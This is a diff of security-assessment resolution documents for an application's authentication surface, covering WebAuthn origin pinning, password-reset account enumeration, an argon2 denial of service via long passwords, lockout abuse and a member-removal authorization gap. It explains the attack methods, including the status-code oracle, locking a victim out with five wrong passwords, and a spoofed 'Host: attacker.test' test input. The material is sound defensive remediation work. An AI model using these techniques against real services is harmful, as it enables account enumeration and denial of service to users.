+Pin RP-ID and origin to **validated, configured** values, mirroring A3/P2's "host is configuration, not
+request input" principle. Support the multi-host reality (canonical host, subdomains, verified custom
+domains) explicitly rather than by trusting the request.
+
+### Implementation steps
+
+1. **Pin the RP-ID to a stable, configured value.** Use the registrable canonical domain — the
+   eTLD+1-style apex that all first-party hosts share — so a single RP-ID covers `app.example.com`,
+   `www.example.com`, etc. Derive it from `DomainStrategy.canonical_domain` (already the configured
+   `site.host`/`domains.default`):
+
+   ```ruby
+   # webauthn.rb
+   auth.webauthn_rp_id do
+     # Stable RP-ID from configuration, NOT request.host.
+     # RP-ID must be a registrable suffix of the origin's host.
+     Onetime::Middleware::DomainStrategy.canonical_domain ||
+       Onetime.conf.dig('site', 'host')
+   end
+   ```
+
+   The RP-ID **must be a registrable suffix of every origin** WebAuthn will accept (WebAuthn spec rule).
+   If the canonical host is `app.example.com` and you also serve `www.example.com`, set the RP-ID to
+   `example.com` so both origins validate; if you only ever serve the exact canonical host, use it
+   directly. Decide this from the deployment's host topology and document it.
+
+2. **Validate the origin against an allowlist instead of echoing the request.** Accept the request origin
+   only if it matches the canonical host or a verified host; otherwise fall back to the canonical origin
+   (never reflect an arbitrary host):
+
+   ```ruby
+   auth.webauthn_origin do
+     canonical = Onetime::Middleware::DomainStrategy.canonical_domain
+     scheme    = Onetime.conf.dig('site', 'ssl') ? 'https' : 'http'
+     # Prefer the validated display domain when it is an allowed first-party host;
+     # otherwise pin to the canonical origin.
+     host = env['onetime.display_domain']
+     host = canonical unless allowed_webauthn_host?(host)   # see step 3
+     "#{scheme}://#{host}"
+   end
+   ```
+
+   `env['onetime.display_domain']` is already the sanitized/validated host
+   (`domain_strategy.rb:130-137`), so this leans on the same allowlist A3/P2 introduces rather than
+   re-implementing host validation.
+
+3. **Custom-domain support → explicit per-domain RP-ID map.** OTS supports verified custom domains
+   (`CustomDomain`). A WebAuthn credential is bound to the RP-ID under which it was registered, so a
+   custom-domain user's credentials must use that domain's RP-ID, not the canonical one. Implement
+   `allowed_webauthn_host?`/RP-ID selection against the verified `CustomDomain` registry: for a request
+   on a verified custom domain, use that domain (or its registrable apex) as the RP-ID/origin; for
+   first-party hosts, use the canonical domain. Do **not** derive either from an unverified request host.
+
+4. **Land on top of A3/P2.** This is item 4 of `A3-P2-host-header-trust.md`'s prescription. Once the edge
+   + `DomainStrategy` reject/allowlist untrusted hosts and `env['onetime.display_domain']` is
+   trustworthy, steps 1–3 reduce to "read the validated host/config." Sequence A6 immediately after A3/P2.
+
+### RP-ID stability & migration implications (important)
+
+Changing the RP-ID is a **credential-invalidating** operation: an authenticator stores credentials keyed
+by the RP-ID used at registration, and an assertion under a different RP-ID will not match. Therefore:
+
+- **Choose the RP-ID once, deliberately.** If existing credentials were registered under
+  `request.host` values (e.g. `app.example.com`), and you switch the pinned RP-ID to `example.com` (the
+  apex), those existing credentials **break** — users must re-register. Picking the apex up front
+  maximizes future host flexibility but only if it matches what was used at registration.
+- **Prefer the value already in use.** If production has only ever served one host, pin the RP-ID to
+  that exact host to avoid invalidating enrolled credentials. Audit the `account_webauthn_*` table /
+  registration history to learn which RP-ID(s) credentials currently assume before changing anything.
+- **If a change is unavoidable**, treat it as a credential migration: notify affected users, keep TOTP /
+  recovery codes (A5) as the fallback factor through the transition, and require re-enrollment of
+  WebAuthn under the new RP-ID. There is no in-place re-key for WebAuthn credentials.
+- **Origin can vary; RP-ID should not.** You may safely broaden the *origin* allowlist (multiple first-
+  party hosts/custom domains) as long as each origin's host is the RP-ID or a subdomain of it — that
+  does not invalidate credentials. It is the RP-ID that must stay stable.
+
+### Alternatives considered
+
+- **Keep `request.host` but validate it against an allowlist first:** partial — it fixes origin
+  echoing, but still derives RP-ID per-request, which is fragile (a momentary misconfig changes the
+  RP-ID and breaks credentials). Pinning RP-ID to configuration is more robust.
+- **Hard-code a single RP-ID constant:** simplest and safe for single-host deployments, but breaks
+  custom-domain WebAuthn. The config-driven canonical + per-custom-domain map (step 3) preserves the
+  feature set.
+- **Set `webauthn_user_verification 'required'` here:** that is finding 01 §16 (A separate Low item), not
+  A6; note it as a complementary hardening but keep it out of scope for this fix.
+
+## Test / verification
+
+Add to `apps/web/auth/spec/` (WebAuthn integration):
+
+1. **Origin not reflected:** drive a WebAuthn registration/auth ceremony with `Host: attacker.test`
+   (and via `X-Forwarded-Host` from a non-trusted peer) → the RP-ID/origin used for verification is the
+   canonical host, **not** the attacker host; the ceremony for a canonical-host credential still
+   succeeds, and an attacker-host ceremony cannot satisfy a canonical-host credential.
+2. **Canonical happy path:** register + assert on the canonical host → succeeds.
+3. **Custom domain:** for a verified custom domain, RP-ID/origin resolve to that domain; an unverified
+   host falls back to canonical (no echo).
+4. **RP-ID stability regression:** a credential registered under the pinned RP-ID still asserts after a
+   request arrives with a different `Host` (proves verification no longer tracks the request host).
+
+## Effort & risk
+
+- **Effort:** Small once A3/P2 lands (two config blocks + reuse of `canonical_domain` /
+  `display_domain`); Medium if the custom-domain RP-ID map is built out.
+- **Risk:** **Medium–High if mis-sequenced** — the dominant risk is RP-ID choice invalidating existing
+  WebAuthn credentials. Audit current RP-ID usage first; pin to the value already in use unless a
+  deliberate, communicated re-enrollment is planned. Roll out behind the domains feature flag alongside
+  A3/P2, and keep TOTP/recovery as fallback during any transition.

--- a/docs/security/assessment-2026-06-22/resolutions/A7-reset-enumeration-password-dos.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A7-reset-enumeration-password-dos.md
@@ -1,0 +1,184 @@
+# A7 — Password-reset account enumeration + no maximum password length (argon2 DoS)
+
+- **Severity:** Medium (two related hardening gaps on the reset/password-set surface)
+- **Status:** Proposed fix
+- **Affects default config?** No — gated on auth being enabled (Rodauth full-auth mode). The
+  reset-password and create/change-password routes only exist in full-auth mode.
+- **Related:** Finding 01 §7 (enumeration) + §8 (no max password length). DoS amplified by synchronous
+  email delivery (`config/email/delivery.rb` `fallback: :sync`).
+- **Primary files:**
+  - `apps/web/auth/config/features/account_management.rb:104` (sets `password_minimum_length`; add max here)
+  - `apps/web/auth/config/features/argon2.rb` (hash cost — context for the DoS)
+  - fork `rodauth/lib/rodauth/features/reset_password.rb:65-100,178-180` (distinct responses — root cause)
+  - fork `rodauth/lib/rodauth/features/email_auth.rb:56-69` (the **uniform** pattern to mirror)
+  - fork `rodauth/lib/rodauth/features/login_password_requirements_base.rb:15-16,170-183` (max-length support)
+
+## Problem (recap)
+
+**A7a — Reset-password enumeration.** The `reset_password_request` route returns three
+distinguishable responses depending on account state:
+
+```ruby
+# fork reset_password.rb:73-99
+unless account_from_login(login_param_value)
+  throw_error_reason(:no_matching_login, no_matching_login_error_status, ...)  # 401 "no matching login"
+end
+reset_password_request_for_unverified_account unless open_account?            # -> 403 (below)
+...
+reset_password_email_sent_response                                            # 200 "email sent"
+
+# reset_password.rb:178-180
+def reset_password_request_for_unverified_account
+  throw_error_reason(:unverified_account, unopen_account_error_status, ...)    # 403 "unverified"
+end
+```
+
+Status codes (fork `base.rb`): `no_matching_login_error_status = 401` (`:59`),
+`unopen_account_error_status = 403` (`:80`). With `only_json? true` (`base.rb:46`), the attacker reads
+status + reason and distinguishes **nonexistent (401)** vs **unverified (403)** vs **valid (200)**.
+OTS overrides the *email-auth* request flash but does **not** override the reset flow to be uniform.
+
+**A7b — No maximum password length → argon2 CPU/memory DoS.** `account_management.rb:104` sets
+`password_minimum_length 8` but there is **no** `password_maximum_length`/`password_maximum_bytes`
+(fork default `nil`, `login_password_requirements_base.rb:15-16`). The raw password is fed to argon2id
+(`argon2.rb`, production `t_cost=2, m_cost=16` = 64 MiB) on every signup/reset/change. Argon2 has no
+inherent input truncation (unlike bcrypt's 72 bytes), so multi-megabyte passwords multiply CPU/memory
+per hash — a cheap DoS, amplified by synchronous email send on the same request.
+
+## Root cause
+
+- **A7a:** OTS relies on Rodauth's *default* reset-request behavior, which is enumeration-revealing by
+  design (it tells the user "no such login" / "unverified"). The matching email-auth (magic-link) flow
+  was already hardened to always look like "email sent" (fork `email_auth.rb:60-68`: it attempts the
+  request only for an open account but **always** redirects to the email-sent response with a generic
+  flash). Reset was never given the same treatment.
+- **A7b:** No upper bound on password size is configured, so untrusted input length directly drives
+  argon2 work.
+
+## Prescribed resolution
+
+### A7a — Make the reset-request response uniform (mirror the email-auth flow)
+
+The fix is to make `reset_password_request` always return the same generic "if an account exists, an
+email has been sent" 200 response, regardless of whether the login exists or is verified — exactly the
+shape email-auth already uses. The email is still sent only for a valid, open account; the *response* no
+longer discloses which case occurred.
+
+#### Implementation steps
+
+1. **Suppress the distinguishing errors and force a uniform success response.** Override the two
+   error-raising seams so they no longer differ from the success path, and override the request-error
+   flash to the generic message. In `apps/web/auth/config/features/account_management.rb` (or a small
+   dedicated `reset_password` config module mirroring `features/email_auth.rb`):
+
+   ```ruby
+   # Generic, non-enumerating copy for ALL reset-request outcomes.
+   auth.reset_password_request_error_flash \
+     'If an account with that email exists, a password reset link has been sent.'
+   auth.reset_password_email_sent_notice_flash \
+     'If an account with that email exists, a password reset link has been sent.'
+
+   # Do NOT reveal "no matching login": treat a missing account as a no-op that
+   # still returns the email-sent response (mirrors fork email_auth.rb:60-68).
+   auth.no_matching_login_message 'If an account with that email exists, a password reset link has been sent.'
+
+   # Do NOT 403 on unverified accounts during reset-request: swallow the
+   # unverified branch so it produces the same uniform response.
+   auth.reset_password_request_for_unverified_account do
+     # no-op: fall through to the standard email-sent response without an email
+     # (or send the verify-account email instead — see step 3). Crucially, do not
+     # throw :unverified_account / 403 here.
+     nil
+   end
+   ```
+
+   The cleanest structural option (preferred): override the `reset_password_request` route body to follow
+   the email-auth shape — attempt key generation + send **only** when `account_from_login && open_account?`,
+   and **always** end with `reset_password_email_sent_response` and a 200. This removes both the 401 and
+   403 branches in one place rather than patching each message/status. If overriding the route is too
+   invasive, the value-method overrides above achieve the same externally observable result (uniform 200,
+   generic message, no distinguishing reason/status).
+
+2. **Normalize status codes too, not just flashes.** Because `only_json? true`, the attacker reads the
+   HTTP status. Ensure the no-match and unverified paths no longer emit 401/403 — overriding
+   `reset_password_request_for_unverified_account` to a no-op and routing the no-match case through the
+   email-sent response yields a uniform 200. Verify the JSON body's `reason`/`field-error` are also
+   generic (no `:no_matching_login`/`:unverified_account` leak).
+
+3. **Decide the unverified-account behavior deliberately.** Two acceptable options, both
+   non-enumerating: (a) silently no-op (send nothing) — simplest; or (b) send the *verify-account* email
+   instead of a reset email, so a real-but-unverified user gets a useful next step. Either way the
+   *response* is identical to the account-exists case. Document the choice.
+
+4. **Keep timing uniform-ish.** Reset already does a DB lookup for all cases; the dominant time
+   difference is the email send. Since email is `fallback: :sync`, only sending in the valid case adds
+   latency. Prefer enqueuing email asynchronously (or adding a constant small delay) so response timing
+   does not re-introduce the oracle the status/flash change just closed. (Cross-ref the login timing
+   oracle, finding 01 §15 — same class of issue.)
+
+### A7b — Cap password length before hashing
+
+The fork already supports the cap; it is simply unset.
+
+#### Implementation steps
+
+1. **Set `password_maximum_bytes` in `apps/web/auth/config/features/account_management.rb`** next to
+   the existing minimum:
+
+   ```ruby
+   auth.password_minimum_length 8
+   auth.password_maximum_bytes 1024   # reject inputs >1 KiB before argon2 runs
+   ```
+
+   `password_maximum_bytes` is validated in `password_meets_length_requirements?`
+   (`login_password_requirements_base.rb:177`: `password_maximum_bytes < password.bytesize`) which runs
+   **before** `set_password`/argon2, so oversized inputs are rejected with a 422-class field error rather
+   than hashed. Prefer `password_maximum_bytes` over `password_maximum_length` so multibyte/unicode
+   passwords are bounded by actual byte size (the argon2 cost driver), not character count.
+
+2. **Pick the cap deliberately.** 1024 bytes comfortably exceeds any legitimate passphrase while
+   bounding argon2 work. The finding suggested 256–4096; 1024 is a reasonable middle. NIST allows long
+   passwords, so do not set it too low (≥64 chars recommended minimum upper bound); 1024 bytes preserves
+   long passphrases while stopping megabyte payloads.
+
+3. **Verify the cap applies on every password-setting path** — create-account, reset-password, and
+   change-password all funnel through `password_meets_requirements?`, so a single config covers all
+   three. (Reset: fork `reset_password.rb:133`; create/change use the same base check.)
+
+4. **Defense-in-depth:** keep email delivery async (above) and confirm a request-body size limit at the
+   edge/middleware so multi-megabyte POST bodies are rejected before reaching the handler at all.
+
+### Alternatives considered
+
+- **A7a — only change the flash text, keep 401/403 statuses:** rejected — with `only_json?` the status
+  code itself is the oracle; the statuses must also collapse to a uniform 200.
+- **A7a — return 200 but still send distinct internal reasons in the JSON body:** rejected — the body
+  is attacker-readable; reasons must be generic.
+- **A7b — truncate the password to N bytes instead of rejecting:** rejected — silent truncation creates
+  surprising behavior and a weak-password footgun; an explicit length error is clearer and safer.
+- **A7b — rely on argon2 cost tuning alone:** rejected — cost tuning bounds per-hash work at a fixed
+  input size but does nothing about unbounded input length; the byte cap is the actual control.
+
+## Test / verification
+
+Add to `apps/web/auth/spec/`:
+
+1. **A7a uniformity:** POST reset-request for (a) a nonexistent email, (b) an existing **unverified**
+   account, (c) an existing **verified** account → all three return the **same** HTTP status (200) and
+   the **same** generic flash/JSON body; assert no `:no_matching_login`/`:unverified_account` reason
+   leaks. Confirm an email is sent only in case (c) (and/or a verify email in (b) per the chosen policy).
+2. **A7a timing:** assert response timing for (a)/(b)/(c) is not separable (email is async / constant
+   delay), so the status fix is not undone by a timing oracle.
+3. **A7b length cap:** POST a password of `password_maximum_bytes + 1` bytes to create-account,
+   reset-password, and change-password → each rejected with the too-many-bytes field error **before**
+   argon2 runs (assert argon2 is not invoked, e.g. via a hashing spy / no measurable hash latency).
+4. **A7b happy path:** a long-but-reasonable passphrase (e.g. 200 bytes) still succeeds.
+5. **Regression:** existing valid reset and password-change flows still succeed end to end.
+
+## Effort & risk
+
+- **Effort:** Small. A7b is a one-line config (`password_maximum_bytes`). A7a is a handful of value-method
+  overrides (or one route override) mirroring the existing email-auth pattern + making email async.
+- **Risk:** Low. A7a is externally a UX copy change (users now always see "if an account exists…");
+  ensure support docs reflect that reset no longer says "no such account." A7b could reject pathological
+  legitimate inputs only above the chosen cap — 1024 bytes avoids any realistic false positive.

--- a/docs/security/assessment-2026-06-22/resolutions/A8-lockout-targeted-dos.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A8-lockout-targeted-dos.md
@@ -1,7 +1,7 @@
 # A8 — Per-account lockout enables targeted victim DoS (~1-day window)
 
 - **Severity:** Medium
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** No — gated on auth being enabled (Rodauth full-auth mode). Lockout is on
   in full mode (`AUTH_LOCKOUT_ENABLED`, default enabled, `lockout.rb:7`).
 - **Related:** Finding 01 §9. Login timing oracle §15, rate-limiting posture generally. Interacts with
@@ -9,6 +9,21 @@
 - **Primary files:**
   - `apps/web/auth/config/features/lockout.rb:15-16` (OTS lockout config — the fix point)
   - fork `rodauth/lib/rodauth/features/lockout.rb:33,42,178-217,263-268` (lockout mechanism)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §3e/§5).**
+> The prescribed fix below — overriding `account_lockouts_deadline_interval` — is a **no-op on SQLite
+> (the default DB) and PostgreSQL**. Hand-verified against rodauth 2.42.0: the interval is written into the
+> `account_lockouts.deadline` column **only** when `set_deadline_values?` is true, and that method is
+> `db.database_type == :mysql` (`base.rb:750-752`; written at `base.rb:920-926`). On non-MySQL backends the
+> deadline comes from the column default `now + 1 day` (migration `001_initial.rb:47-53`), so the interval
+> override — and the exponential-backoff block in step 1 — change nothing. This is distinct from, and in
+> addition to, the dead-method-name bug in root cause #2 below.
+>
+> **Corrected fix:** make the interval authoritative on every backend by overriding `set_deadline_values?`
+> to return `true` (single source of truth), **or** pair a column-default migration with the interval
+> (keeping the MySQL-only writer). The backoff logic is otherwise sound once the deadline is actually driven
+> by the interval. (This control lives on the full-mode-only `web/auth` surface, so it remains not
+> default-reachable.)
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/A8-lockout-targeted-dos.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A8-lockout-targeted-dos.md
@@ -1,0 +1,151 @@
+# A8 — Per-account lockout enables targeted victim DoS (~1-day window)
+
+- **Severity:** Medium
+- **Status:** Proposed fix
+- **Affects default config?** No — gated on auth being enabled (Rodauth full-auth mode). Lockout is on
+  in full mode (`AUTH_LOCKOUT_ENABLED`, default enabled, `lockout.rb:7`).
+- **Related:** Finding 01 §9. Login timing oracle §15, rate-limiting posture generally. Interacts with
+  passwordless paths (magic-link/SSO) and reset, which are **not** lockout-gated.
+- **Primary files:**
+  - `apps/web/auth/config/features/lockout.rb:15-16` (OTS lockout config — the fix point)
+  - fork `rodauth/lib/rodauth/features/lockout.rb:33,42,178-217,263-268` (lockout mechanism)
+
+## Problem (recap)
+
+`max_invalid_logins 5` (`lockout.rb:15`) with the `lockout_expiration_default` override **commented out**
+(`lockout.rb:16`) means 5 bad passwords lock an account for the Rodauth default window. Knowing a
+victim's email, an attacker submits 5 wrong passwords and locks that account for ~1 day — a cheap,
+targeted denial of service against a specific user. Self-service unlock exists (unlock-account email) but
+forces a victim email round-trip.
+
+Lockout is keyed on `account_id` and enforced in `before_login_attempt` (fork `lockout.rb:263-268`):
+
+```ruby
+def before_login_attempt
+  if locked_out?            # true while now < account_lockouts.deadline
+    show_lockout_page       # 4xx, blocks the password login attempt
+  end
+  super
+end
+```
+
+## Root cause — two issues, one of them a latent config bug
+
+1. **The lockout window is far too long for a per-account control.** The intended duration knob is
+   `account_lockouts_deadline_interval`, whose fork default is **1 day** (`lockout.rb:42`:
+   `auth_value_method :account_lockouts_deadline_interval, {:days=>1}.freeze`). A multi-hour hard lock
+   keyed on a value an attacker fully controls (the victim's email/account) trades brute-force
+   resistance for a trivially weaponizable DoS.
+
+2. **The commented-out override would not have worked anyway — wrong method name.**
+   `lockout.rb:16` references `auth.lockout_expiration_default 3600`, but **no such method exists** in
+   this Rodauth fork (verified by grep over `/home/user/rodauth`; the only duration method is
+   `account_lockouts_deadline_interval`). So even if that line were uncommented, it would be a no-op (or
+   raise), and the 1-day default would still apply. Any shortening must target
+   `account_lockouts_deadline_interval`.
+
+> **Confirm first:** Verify there is no app-level shim aliasing `lockout_expiration_default` to the
+> deadline interval before relying on the above. Grep found none in the fork; confirm none exists in
+> `apps/web/auth` overrides. The prescription uses the real `account_lockouts_deadline_interval`.
+
+## Prescribed resolution
+
+Shift from a long hard per-account lock toward **layered, attacker-cost-asymmetric** controls: a short
+account lock + IP/global rate limiting + the existing email-unlock escape, so a single account is not
+trivially DoS-able by a remote actor while brute-force resistance is preserved.
+
+### Implementation steps
+
+1. **Shorten the lockout window with backoff.** Replace the long default with a short base window. Rodauth
+   accepts a callable for `account_lockouts_deadline_interval`, which enables exponential backoff keyed on
+   the failure count (so repeated, sustained attacks still escalate, but a one-off 5-fail burst clears
+   quickly):
+
+   ```ruby
+   # apps/web/auth/config/features/lockout.rb
+   auth.max_invalid_logins 5
+
+   # Short base window with exponential backoff. The block can read the current
+   # failure count to scale the window: e.g. 15 min, then 30, 60, ... capped.
+   auth.account_lockouts_deadline_interval do
+     fails  = account_login_failures_ds.get(account_login_failures_number_column).to_i
+     extra  = [fails - max_invalid_logins, 0].max          # 0 at first lockout
+     minutes = [15 * (2 ** extra), 240].min                # 15m -> 30 -> 60 -> ... cap 4h
+     { seconds: minutes * 60 }
+   end
+   ```
+
+   This caps a casual targeted DoS at ~15 minutes for the common case while preserving escalation against
+   a persistent brute-force attacker. (If a callable form is not supported in this fork's version for
+   this method, set a short fixed interval, e.g. `{ minutes: 15 }`, and rely on IP throttling below for
+   sustained-attack coverage — **confirm the method's accepted argument types first**.)
+
+2. **Add IP/network rate limiting in front of the login route.** A per-account lock can always be abused
+   for DoS; the real brute-force defense should be **IP/global throttling**, which targets the attacker's
+   vantage rather than the victim's account. Apply request-rate limits on the login + reset + unlock
+   routes (OTS already has rate-limiting infrastructure — reuse it, or add a Rack throttle keyed on
+   resolved client IP via the otto trusted-proxy resolution referenced in `A3-P2-host-header-trust.md`).
+   With IP throttling carrying the brute-force load, the per-account lock can be safely short.
+
+3. **Add CAPTCHA / proof-of-work step-up after N failures (optional).** Before/at the lock threshold,
+   require a CAPTCHA on subsequent login attempts for that login. This raises attacker cost without
+   locking the legitimate user out, further reducing reliance on the hard lock.
+
+4. **Keep email-unlock as the escape, and ensure it's non-enumerating + rate-limited.** The
+   unlock-account-request flow (`lockout.rb:70-97`) already gates resend (`unlock_account_skip_resend_email_within`,
+   300s). Confirm it does not leak account existence on the no-match branch (it currently sets
+   `:no_matching_login`, `lockout.rb:91-93` — align with the uniform-response approach in
+   `A7-reset-enumeration-password-dos.md`).
+
+5. **Preserve the safe properties already present.** Passwordless paths (magic-link/SSO) and reset are
+   **not** gated by lockout — keep it that way so a locked-out legitimate user retains recovery routes;
+   this also means lockout must not be the *only* brute-force control (hence steps 2–3).
+
+### Balancing brute-force vs DoS (rationale)
+
+- A 64-MiB argon2 hash (production cost) makes online password brute force inherently slow; the lock's
+  job is to stop sustained guessing, not to be the sole barrier. A **15-minute** base window after 5
+  fails caps online guessing to a low rate while making targeted DoS self-healing within minutes.
+- Exponential backoff means a *persistent* attacker against one account still hits escalating delays
+  (up to the 4-hour cap), so sustained brute force is not rewarded — but a drive-by 5-fail lock no
+  longer costs the victim a full day.
+- IP throttling (step 2) is what actually scales against distributed/credential-stuffing attacks, since
+  it does not depend on the target account at all.
+
+### Alternatives considered
+
+- **Keep the 1-day hard lock:** rejected — it is the DoS primitive; an attacker who knows an email can
+  deny that user access for a day with 5 requests.
+- **Permanent lock until manual/admin unlock:** rejected — worst DoS profile and a support burden.
+- **No lockout, rely solely on IP throttling:** rejected — removes a useful per-credential signal and
+  weakens defense against low-and-slow guessing from rotating IPs; keep a *short* account lock plus IP
+  throttling (defense-in-depth).
+- **Uncomment `lockout_expiration_default 3600`:** rejected — that method does not exist in this fork
+  (root cause #2); it would be a no-op. Use `account_lockouts_deadline_interval`.
+
+## Test / verification
+
+Add to `apps/web/auth/spec/`:
+
+1. **Short window:** trigger 5 failed logins → account locked; advance clock past the new base window
+   (e.g. 15 min) → `locked_out?` is false and login succeeds (fork auto-unlocks on expiry,
+   `lockout.rb:149-160`). Assert the lock did **not** last ~1 day.
+2. **Backoff escalation:** repeated lock cycles produce increasing deadlines up to the cap (assert the
+   computed interval grows then plateaus).
+3. **Config-bug regression guard:** assert the effective deadline derives from
+   `account_lockouts_deadline_interval` (not a no-op `lockout_expiration_default`); a unit test asserting
+   the configured/overridden value catches future reintroduction of the dead method name.
+4. **IP throttling:** N rapid login attempts from one IP across *different* accounts are throttled
+   (brute-force/credential-stuffing coverage independent of any single account lock).
+5. **Recovery paths unaffected:** a locked-out account can still use magic-link/SSO/reset (these are not
+   lockout-gated); unlock-account email still works and its request response is non-enumerating
+   (cross-ref A7).
+
+## Effort & risk
+
+- **Effort:** Small for the window/backoff change (config in `lockout.rb`); Medium if IP throttling /
+  CAPTCHA step-up are newly added (reuse existing rate-limit infra where possible).
+- **Risk:** Low. Shortening the window strictly reduces DoS exposure; the main consideration is ensuring
+  IP throttling (step 2) is in place so the shorter account lock does not weaken brute-force resistance.
+  Validate the `account_lockouts_deadline_interval` callable form against the fork version before relying
+  on backoff; fall back to a short fixed interval otherwise.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ1-remove-member-entitlement-gate.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ1-remove-member-entitlement-gate.md
@@ -1,0 +1,122 @@
+# AZ1 — RemoveMember authorization inconsistency (entitlement-gate the only un-gated member op)
+
+- **Severity:** Medium — **CONFIRMED** (defense-in-depth / consistency, not directly exploitable today)
+- **Status:** Proposed fix
+- **Affects default config?** Yes (organization member management is a default feature)
+- **Related:** finding 02 F1; siblings `create_invitation.rb`, `revoke_invitation.rb`, `resend_invitation.rb`,
+  `list_invitations.rb`, `update_member_role.rb`, `delete_organization.rb`; AZ4 (owner-guard at model layer)
+- **Primary files:** `apps/api/organizations/logic/members/remove_member.rb`,
+  `lib/onetime/logic/base.rb` (`require_entitlement_in!`),
+  `lib/onetime/models/organization_membership.rb` (`ROLE_ENTITLEMENTS`)
+
+## Problem (recap)
+
+`RemoveMember` is the **only** member-management endpoint that does not call `require_entitlement_in!`.
+Every sibling routes its authority through the entitlement model:
+
+- `manage_members`: `create_invitation.rb:42`, `resend_invitation.rb:28`, `list_invitations.rb:24`,
+  `revoke_invitation.rb:25`
+- `manage_org`: `update_member_role.rb:45`, `delete_organization.rb:38`
+- `api_access`: `list_members.rb:35`, `get_organization.rb:38`
+
+`RemoveMember` instead authorizes with raw **role-string** comparisons in `validate_removal!`
+(`remove_member.rb:135-181`):
+
+```ruby
+# remove_member.rb:159-181
+actor_role  = @actor_membership.role
+target_role = @target_membership.role
+case actor_role
+when 'owner' then true
+when 'admin' then raise ... if target_role == 'admin'
+else raise ...   # members denied
+end
+```
+
+A plain `member` falls to the `else` branch and is denied, so there is no direct privilege-escalation
+today. The defect is architectural: authority lives in role strings rather than entitlements, contradicting
+the model's own contract — "authority lives in the materialized entitlements, not role string checks"
+(`organization_membership.rb:63-65`).
+
+## Root cause
+
+Two parallel authorization mechanisms coexist. The canonical one (`require_entitlement_in!`,
+`lib/onetime/logic/base.rb:271-318`) is fail-closed: it rejects anonymous callers, requires an **active**
+membership, and consults `membership.can?(entitlement)` — which honors per-membership grants/revokes and the
+org plan ceiling. The role-string path in `RemoveMember` bypasses all of that:
+
+- A per-membership **revoke** of `manage_members` (operator action) would be ignored — a demoted admin could
+  still remove members as long as the `role` field still read `admin`.
+- A stale or out-of-band `role` string is trusted directly, with no entitlement reconciliation.
+- The colonel bypass is re-implemented locally (`remove_member.rb:94-98,152-153`) instead of reusing the
+  vetted `has_system_role?('colonel')` path inside `require_entitlement_in!`.
+
+## Prescribed resolution
+
+Add the same entitlement gate the sibling member-management endpoints use, then keep the role-hierarchy
+rules only as a secondary, post-entitlement business-rule check (owner-protection, self-removal, admin
+cannot remove admin). Entitlement is the *authority*; the role rules are *who-may-remove-whom* policy.
+
+### Implementation steps
+
+1. In `remove_member.rb#raise_concerns`, after loading the organization and **before** the role-string
+   validation, add:
+
+   ```ruby
+   # apps/api/organizations/logic/members/remove_member.rb (raise_concerns)
+   @organization = load_organization(@extid)
+
+   # Canonical, fail-closed authority — matches every other member-mgmt endpoint.
+   require_entitlement_in!(@organization, 'manage_members')
+
+   @actor_membership = load_actor_membership(@organization)
+   # ... domain-scope check, target load, validate_removal! ...
+   ```
+
+   `require_entitlement_in!` already (a) rejects anonymous users, (b) requires an active membership,
+   (c) bypasses for colonels via `has_system_role?('colonel')`, and (d) checks
+   `membership.can?('manage_members')`. `manage_members` is in `ADMIN_ENTITLEMENTS`
+   (`organization_membership.rb:80-88`), so it is held by `admin` and `owner` roles and honors operator
+   revokes.
+
+2. Keep `validate_removal!` for the *target-protection* rules that entitlements do not express:
+   - cannot remove the owner (`remove_member.rb:137-142`),
+   - cannot remove yourself (`:145-150`),
+   - admin cannot remove another admin (`:166-173`).
+
+   These remain valid business rules layered on top of the entitlement check.
+
+3. Simplify the now-redundant colonel handling: with `require_entitlement_in!` running first, a colonel
+   already passes the gate even with no membership. `load_actor_membership` can still return `nil` for a
+   colonel (`:93-98`); guard the role-string branch so a nil actor membership for a colonel does not raise
+   (the existing `return if cust.role?(:colonel)` at `:153` already covers this — verify it stays before any
+   `@actor_membership.role` dereference).
+
+### Alternatives considered
+
+- **Leave role-string checks, add no entitlement gate:** rejected — perpetuates two authorization models and
+  silently ignores per-membership revokes; the assessment explicitly flags this divergence.
+- **Replace role-string rules entirely with entitlements:** the *who-can-remove-whom* hierarchy (admin
+  cannot remove admin; owner is unremovable) is finer-grained than the `manage_members` boolean, so the
+  role rules must stay as a second layer. Use entitlement for the gate, role rules for the policy.
+
+## Test / verification
+
+Add to `apps/api/organizations/spec/logic/members/`:
+1. **Entitlement-revoke regression:** an `admin` whose membership has `manage_members` revoked
+   (operator override) attempts removal → now `Forbidden` (was previously allowed by role string). This is
+   the behavior change that proves the fix.
+2. **Member denied:** plain `member` → `Forbidden` (unchanged).
+3. **Happy paths:** owner removes admin/member; admin removes member — all succeed.
+4. **Target protection unchanged:** removing the owner, removing self, admin removing admin → still raise the
+   existing errors.
+5. **Colonel bypass:** colonel with no membership removes a member → succeeds and emits the existing audit
+   line (`remove_member.rb:70-72`).
+
+## Effort & risk
+
+- **Effort:** Low — one added line plus a small re-ordering and one regression spec.
+- **Risk:** Low. The only behavior change is correctly denying actors whose `manage_members` entitlement was
+  revoked out-of-band; all role-based happy paths are preserved by the retained `validate_removal!`.
+- **Priority:** highest of the AZ set — it closes a model/role divergence cheaply and aligns the endpoint
+  with the rest of the codebase.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ2-organization-safe-dump-minimization.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ2-organization-safe-dump-minimization.md
@@ -1,0 +1,133 @@
+# AZ2 — Organization safe_dump leaks internal IDs, owner custid, and contact/billing PII
+
+- **Severity:** Medium — **CONFIRMED**
+- **Status:** Proposed fix
+- **Affects default config?** Yes (any active org member can read the org via `get_organization`)
+- **Related:** finding 02 F2; AZ5 (extid derivable once objid leaks); AZ6 (same class for Receipt)
+- **Primary files:** `lib/onetime/models/organization/features/safe_dump_fields.rb`,
+  `apps/api/organizations/logic/organizations/get_organization.rb`,
+  `lib/onetime/models/organization.rb` (opaque-ID doc, `:10-30`)
+
+## Problem (recap)
+
+`Organization` safe_dump emits internal and cross-tenant-sensitive fields to any caller that can serialize
+the org. `get_organization.rb:38` gates only on `api_access`, which every active member (including a plain
